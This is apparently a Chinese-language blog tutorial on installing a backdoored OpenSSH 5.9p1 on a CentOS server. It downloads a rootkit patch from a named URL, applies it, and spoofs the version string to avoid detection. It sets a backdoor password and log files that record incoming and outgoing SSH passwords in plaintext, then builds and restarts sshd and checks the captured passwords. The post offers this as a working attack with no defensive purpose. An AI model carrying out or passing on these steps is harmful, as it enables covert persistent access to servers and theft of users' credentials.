OpenSSH后门的安装

发表于 | 分类于 | 热度

本来想结合实战一起写出来的,但提权过程中出现了些问题,所以就单独写吧。

本机环境:centos6.5 OpenSSH_5.3p1

准备工作

下载openssh的安装包和后门安装包。
安装包:http://www.openssh.com
后门安装包:http://core.ipsecs.com/rootkit/patch-to-hack/0x06-openssh-5.9p1.patch.tar.gz

为了伪装

在安装后门之前,先查看本机的ssh版本号ssh-V

解压安装包

tar zxvf openssh-5.9p1.tar.gz
tar zxvf 0x06-openssh-5.9p1.patch.tar.gz

注入后门

将后门文件夹的sshbd5.9p1.diff复制到openssh-5.9p1文件夹中,并在该openssh-5.9p1文件夹执行patch <sshbd5.9p1.diff命令

修改版本号和后门密码

openssh-5.9p1文件夹中执行vim version.h修改版本号(为了伪装,这里修改成一开始记下来的版本号),修改后门密码和记录密码的保存路径vim includes.h


ilog是记录别的机子登录本机的密码
olon是记录本机登录到别的机子的密码
(这应该能理解吧)

安装

在安装之前先安装配置环境,不然会报错。
yum install -y openssl openssl-devel pam-devel
yum install zlib-devel
yum install gcc
yum install openssl
yum install openssl-devel

安装及编译:
./configure --prefix=/usr --sysconfdir=/etc/ssh --with-pam --with-kerberos5


显示到这个说明编译成功,然后执行makemake install命令安装
执行命令sevice ssh restart重启ssh

测试后门

kali链接ssh

查看登录过来的ssh密码cat /tmp/ilog

还是明文的
OK!大功告成

特别注意的是,整个过程都是在root用户下执行的,不然没有权限执行。